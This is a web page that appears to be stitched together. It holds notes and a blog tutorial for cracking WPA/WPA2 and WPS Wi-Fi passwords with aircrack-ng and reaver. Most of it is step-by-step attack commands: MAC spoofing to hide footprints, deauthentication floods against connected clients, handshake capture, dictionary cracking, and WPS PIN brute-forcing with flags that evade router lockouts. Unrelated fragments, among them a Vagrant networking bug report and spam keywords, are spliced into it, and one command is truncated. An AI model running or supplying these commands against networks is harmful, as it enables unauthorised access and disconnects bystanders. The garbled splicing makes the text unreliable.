Disclaimer : This info is shared for education purpose only. I dont take any responsibility if any person/org uses it intentionally harm any one.
This less like a tutorial but more like my personal notes while studying the security.
Things you need : KALI Linux, Aircrank-ng suite (NO EXCEPTIONS)
1. Down the interface so its not connect to any network
ifconfig wlan0 down
2. Start wlan0 on monitor mode, result would be mon0, mon1… mon#
airmon-ng start wlan0
3. Change the mac on monitor interface (not needed but pen testing can’t be done without clearing out your own footprints)
ifconfig mon0 down
macchanger -r mon0 //this would give random mac address to monitor interface
ifconfig mon0 up
4. Check if you got new mac address
ifconfig man0
5. Dumping from specific channel
airodump-ng mon0 -c 11
Sadly, I can't remember what the command is the find the previous entry, but. Hope this helps, and if you need to find the previous entry, I hope this inspires you enough to google and figure it out! Edit: THANKS ALL! There is some GREAT info in the comments; I really appreciate everyone's contribution, and I'm learning even more.
- We should have eth2 match the same behavior of eth1 by receiving its static IP from the Vagrantfile. This would likely work if the MAC address was correctly formatted i.e. Not concatenated with eth1's MAC address. Actual behaviour. The eth2 interface receives a DHCP IP address instead of a static one. See above for more details.
- Dismiss Join GitHub today. GitHub is home to over 50 million developers working together to host and review code, manage projects, and build software together.
6. Starting the packing dump and writing
airodump-ng -w H6762 –bssid BC:CA:B5:39:67:60 -c 11 –ivs mon0
-w fileName That would use to make .ivs files
–bssid AP’s Mac access
-c Channel Number
–ivs = only dump IV Intial Vector so dump file size is small
mon0 – your interface which is monitoring
7. Check packet injection
aireplay-ng -9 -e HOME-6762 -a BC:CA:B5:39:67:60 mon0
8. Deauthing the client so it would conenct again and we woudld get handshake between client and AP
aireplay-ng –deauth 5 -a BC:00:B5:00:67:60 -c 84:00:A5:30:F0:00 mon0
–deauth #number of packets
-a Access point AKA Router
-c Client or Station
9. Starting the dictionary attack to crack the handshake that we got from previous step
aircrack-ng H6562-02.ivs -w /usr/share/wordlists/rockyou.txt
yup if password is in the text file. it would be crack 100% of time. There are bigger file that goes up to 15 gig uncompressed.
Please keep in mind brute force can take a lot of time. So In my opinion, its not practical approach for home users to crack some password with their home computer. No Offense.
Cracking WPS security Reaver way
wash -i mon0
ver -i mon0 –channel 1 –essid SOME-2452 –bssid F8:EE:A5:WW:FF:50 -vv
Little bit description about WPS, Why its so much easier when comes to brute force
An 8 digit pin using 0-9 = 10 to the 8th possible combinations (100,000,000).
However since the 8th digit isn’t part of the pin it is just a check sum of the other 7, total = 10 to the 7th (10,000,000).
However WPS presents the pin in two halves for verification. So if one half of 4 digits are correct it will just work on the other half of 4.
Don’t forget the second half has one space for a check sum, so really it’s just 3 digits in the second half.
The correct total for WPS (10 to the 4th + 10 to the 3rd = 11,000). So the first half has 10,000 possible combinations and the second half has just 1,000.
Short keys (–dh-small,-S) will speed it up. My lab gives me 22-90 secs a pin on updated firmware routers. 2-3 seconds on old firmware.
Also things to note is that even tho the router says locked or no WPS hit it anyway(-L) to vet that because my recent tests show they are unlocked yet flagging locked.
What I used last.
Failed To Retrieve A Mac Address For Interface 'mon0'
“reaver -i monx -a -S -N -E -b xx:xx:xx:xx:xx:xx -vv -d 3 # -r 2:199 # if you are getting locked out too much add that it may help”
-a Auto select some advanced features.
-S Use small diffleman attacks (reduces strain on the router & increases speed).
-N No nacks, just speeds things up a bit.
-E Terminates each pin attempt with an EAPOL fail so it may trick the router into thinking the pin failed and may let you try more before it locks.
-d The default delay period between pin attempts is 1 second.
-r Recurring delay. Sleep for y number of seconds every x pin attempts.
Forget your Key for your internet? No problem. In this blog I will show you how to hack it. Remember this is to be used on your own network and for educational purposes only.
Firstly, know right now. That wifi card you have built into your computer is not going to work. Neither is the one on your phone so you must have an upgraded one with a specific chipset. You’ll need a wireless adapter that’s capable of packet injection.
I recommend one of these:
These external wifis can be attached to laptop or phone using dongles and will have all the hardware you need to do what you go to do.
Failed To Retrieve A Mac Address For Interface 'mon0' Reaver
Next you will need to being running Kali Linux. If you need help setting that up I recommend checking out my blog on how to make an Excalibur USB Stick that has Kali on it.
Here are the basic steps we will be going through:
- 0. Install the latest aircrack-ng
- 1. Start the wireless interface in monitor mode using airmon-ng
- 2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
- 3. [Optional] Use aireplay-ng to deauthenticate the wireless client
- 4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake
0. Install the Latest Aircrack-ng
Install the required dependencies :
$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
Download and install the latest aircrack-ng :
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc1.tar.gz -O – | tar -xz
$ cd aircrack-ng-1.2-rc1
$ sudo make
$ sudo make install
Be sure to check that the version of aircrack-ng is up-to-date because you may see problems with older versions.
1. Start the Wireless Interface in Monitor Mode
Find and stop all processes that could cause trouble :
$ sudo airmon-ng check kill
Start the wireless interface in monitor mode :
$ sudo airmon-ng start wlan0
Notice that airmon-ngenabled monitor-mode on mon0 :
So, the correct interface name to use in later parts of the tutorial is mon0.
2. Start Airodump-ng to Collect Authentication Handshake
Now, when our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air.
It can be done with airodump-ng command : Huawei e392 for mac.
$ sudo airodump-ng mon0 Applications free for mac os.
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen :
Now start airodump-ng on AP channel with filter for BSSID to collect authentication handshake for the access point we are interested in :
$ sudo airodump-ng -c 1 –bssid 00:11:22:33:44:55 -w WPAcrack mon0 –ignore-negative-one
| Option | Description |
|---|---|
| -c | The channel for the wireless network |
| –bssid | The MAC address of the access point |
| -w | The file name prefix for the file which will contain authentication handshake |
| mon0 | The wireless interface |
| –ignore-negative-one | Removes ‘fixed channel : -1’ message |
Now wait until airodump-ng captures a handshake… or go to the step #3 if you want to force this process.
Mac file transfer for android. After some time you’ll notice the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.
This means airodump-ng has successfully captured the handshake.
3. [Optional] Use Aireplay-ng to Deauthenticate the Wireless Client
This step is optional. If you can’t wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we’ll capture the authentication handshake.
Send DeAuth to broadcast :
$ sudo aireplay-ng –deauth 100 -a 00:11:22:33:44:55 mon0 –ignore-negative-one
Send directed DeAuth (attack is more effective when it is targeted) :
$ sudo aireplay-ng –deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 –ignore-negative-one
| Option | Description |
|---|---|
| –deauth 100 | The number of de-authenticate frames you want to send (0 for unlimited) |
| -a | The MAC address of the access point |
| -c | The MAC address of the client |
| mon0 | The wireless interface |
| –ignore-negative-one | Removes ‘fixed channel : -1’ message |
4. Run Aircrack-ng to Crack WPA/WPA2-PSK
To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here.
Crack the WPA/WPA2-PSK with the following command :
$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
| Option | Description |
|---|---|
| -w | The name of the dictionary file |
| -b | The MAC address of the access point |
| WPAcrack.cap | The name of the file that contains the authentication handshake |
If you need some video instruction here is a hacker from SecureNinjaTV explaining how to do it.